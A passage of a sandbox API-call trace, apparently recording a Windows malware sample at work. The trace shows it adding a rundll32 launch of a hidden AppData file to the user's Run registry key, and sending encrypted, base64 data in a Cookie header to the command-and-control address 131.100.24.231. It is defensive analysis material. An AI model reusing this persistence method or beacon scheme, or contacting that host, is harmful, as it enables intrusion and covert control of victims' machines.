hHash=0x2a7ac50) returned 0x0 [0431.983] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0431.983] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0431.983] GetProcessHeap () returned 0x530000 [0431.983] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0431.983] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0431.983] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a7648c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0431.985] GetProcessHeap () returned 0x530000 [0431.985] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6a0 [0431.985] GetProcessHeap () returned 0x530000 [0431.986] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0431.986] GetProcessHeap () returned 0x530000 [0431.986] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0431.986] GetProcessHeap () returned 0x530000 [0431.987] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad2ae0 | out: hHeap=0x530000) returned 1 [0431.987] GetProcessHeap () returned 0x530000 [0431.987] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0431.987] GetProcessHeap () returned 0x530000 [0431.987] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0431.987] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0431.987] GetProcessHeap () returned 0x530000 [0431.987] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0431.987] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XORWAYbbJRxFAT") returned 104 [0431.987] GetProcessHeap () returned 0x530000 [0431.987] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0431.988] GetProcessHeap () returned 0x530000 [0431.988] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0431.988] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0431.988] GetProcessHeap () returned 0x530000 [0431.988] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0431.988] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XORWAYbbJRxFAT") returned 104 [0431.988] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XORWAYbbJRxFAT", cbData=0xd2 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",XORWAYbbJRxFAT") returned 0x0 [0431.989] RegCloseKey (hKey=0x658) returned 0x0 [0431.989] GetProcessHeap () returned 0x530000 [0431.989] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6a0 | out: hHeap=0x530000) returned 1 [0431.989] GetProcessHeap () returned 0x530000 [0431.990] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0431.990] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xea7d0) returned 0x102 [0441.999] GetProcessHeap () returned 0x530000 [0441.999] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0441.999] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0442.000] GetProcessHeap () returned 0x530000 [0442.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0442.000] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0442.000] GetProcessHeap () returned 0x530000 [0442.000] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0442.000] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0442.000] GetProcessHeap () returned 0x530000 [0442.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0442.000] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0442.002] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0442.002] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0442.002] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0442.002] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0442.002] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0442.002] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0442.003] GetProcessHeap () returned 0x530000 [0442.003] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0442.003] GetProcessHeap () returned 0x530000 [0442.003] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0442.003] GetProcessHeap () returned 0x530000 [0442.003] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0442.003] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0442.004] GetProcessHeap () returned 0x530000 [0442.004] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0442.004] GetProcessHeap () returned 0x530000 [0442.004] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0442.004] GetProcessHeap () returned 0x530000 [0442.004] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0442.004] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0442.004] GetProcessHeap () returned 0x530000 [0442.005] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0442.005] GetProcessHeap () returned 0x530000 [0442.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0442.005] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0442.005] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0442.005] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0442.005] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0442.005] GetProcessHeap () returned 0x530000 [0442.005] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0442.005] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0442.005] GetProcessHeap () returned 0x530000 [0442.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76488 [0442.005] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0442.005] GetProcessHeap () returned 0x530000 [0442.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0442.005] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0442.006] GetProcessHeap () returned 0x530000 [0442.006] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe8) returned 0x2b59e28 [0442.006] GetProcessHeap () returned 0x530000 [0442.006] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0442.006] GetProcessHeap () returned 0x530000 [0442.006] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0442.006] CryptBinaryToStringW (in: pbBinary=0x2b59e28, cbBinary=0xe8, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0442.006] GetProcessHeap () returned 0x530000 [0442.006] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x272) returned 0x2a89708 [0442.006] CryptBinaryToStringW (in: pbBinary=0x2b59e28, cbBinary=0xe8, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvkbxeVTKbssAHycjhM4V2XGarVcbZ1+5stXS0hTWCPXtBIXBajGUvR2h3LZqljw6mNg/1DM2cpfw95K9YwIT9221/xA03aUdA==", pcchString=0x2cf504) returned 1 [0442.007] GetProcessHeap () returned 0x530000 [0442.007] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0442.007] GetProcessHeap () returned 0x530000 [0442.007] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f40 [0442.007] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: CbYSdrxHhlgmVmh=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvkbxeVTKbssAHycjhM4V2XGarVcbZ1+5stXS0hTWCPXtBIXBajGUvR2h3LZqljw6mNg/1DM2cpfw95K9YwIT9221/xA03aUdA==\r\n") returned 338 [0442.007] GetProcessHeap () returned 0x530000 [0442.007] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f40 | out: hHeap=0x530000) returned 1 [0442.007] GetProcessHeap () returned 0x530000 [0442.007] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0442.007] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0442.008] GetProcessHeap () returned 0x530000 [0442.008] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0442.008] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0442.011] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="nogGHxUlWIbDIgLssUyF", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0442.011] GetProcessHeap () returned 0x530000 [0442.011] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0442.011] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0442.011] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0442.011] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0442.012] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: CbYSdrxHhlgmVmh=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvkbxeVTKbssAHycjhM4V2XGarVcbZ1+5stXS0hTWCPXtBIXBajGUvR2h3LZqljw6mNg/1DM2cpfw95K9YwIT9221/xA03aUdA==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0443.178] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0443.179] GetProcessHeap () returned 0x530000 [0443.179] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0443.179] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x365) returned 1 [0443.179] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48165, dwNumberOfBytesToRead=0xfc9b, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48165*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0443.179] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0443.179] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0443.179] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0443.179] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0443.179] GetProcessHeap () returned 0x530000 [0443.179] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0443.180] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf51c) returned 0x0 [0443.180] GetProcessHeap () returned 0x530000 [0443.180] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7230 [0443.180] GetProcessHeap () returned 0x530000 [0443.180] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0443.180] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0443.180] GetProcessHeap () returned 0x530000 [0443.180] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7230 | out: hHeap=0x530000) returned 1 [0443.180] GetProcessHeap () returned 0x530000 [0443.181] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0443.181] GetProcessHeap () returned 0x530000 [0443.181] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0443.181] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0443.181] GetProcessHeap () returned 0x530000 [0443.181] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0443.181] GetProcessHeap () returned 0x530000 [0443.181] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0443.181] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0443.181] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a764d0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0443.181] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0443.181] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0443.181] GetProcessHeap () returned 0x530000 [0443.182] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0443.182] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0443.182] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a7648c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0443.184] GetProcessHeap () returned 0x530000 [0443.184] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c640 [0443.184] GetProcessHeap () returned 0x530000 [0443.184] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0443.184] GetProcessHeap () returned 0x530000 [0443.185] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0443.185] GetProcessHeap () returned 0x530000 [0443.185] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b59e28 | out: hHeap=0x530000) returned 1 [0443.185] GetProcessHeap () returned 0x530000 [0443.186] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0443.186] GetProcessHeap () returned 0x530000 [0443.186] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0443.186] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0443.186] GetProcessHeap () returned 0x530000 [0443.186] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a838e0 [0443.186] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FdBImAu") returned 97 [0443.186] GetProcessHeap () returned 0x530000 [0443.187] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a838e0 | out: hHeap=0x530000) returned 1 [0443.187] GetProcessHeap () returned 0x530000 [0443.187] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0443.187] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0443.187] GetProcessHeap () returned 0x530000 [0443.187] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0443.187] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FdBImAu") returned 97 [0443.187] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FdBImAu", cbData=0xc4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FdBImAu") returned 0x0 [0443.188] RegCloseKey (hKey=0x658) returned 0x0 [0443.188] GetProcessHeap () returned 0x530000 [0443.188] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c640 | out: hHeap=0x530000) returned 1 [0443.189] GetProcessHeap () returned 0x530000 [0443.189] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0443.189] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xea8ba) returned 0x102 [0453.199] GetProcessHeap () returned 0x530000 [0453.199] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7230 [0453.200] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0453.200] GetProcessHeap () returned 0x530000 [0453.200] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7230 | out: hHeap=0x530000) returned 1 [0453.200] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0453.200] GetProcessHeap () returned 0x530000 [0453.200] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7230 [0453.200] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0453.200] GetProcessHeap () returned 0x530000 [0453.200] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7230 | out: hHeap=0x530000) returned 1 [0453.200] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a838e0 [0453.203] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0453.203] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, 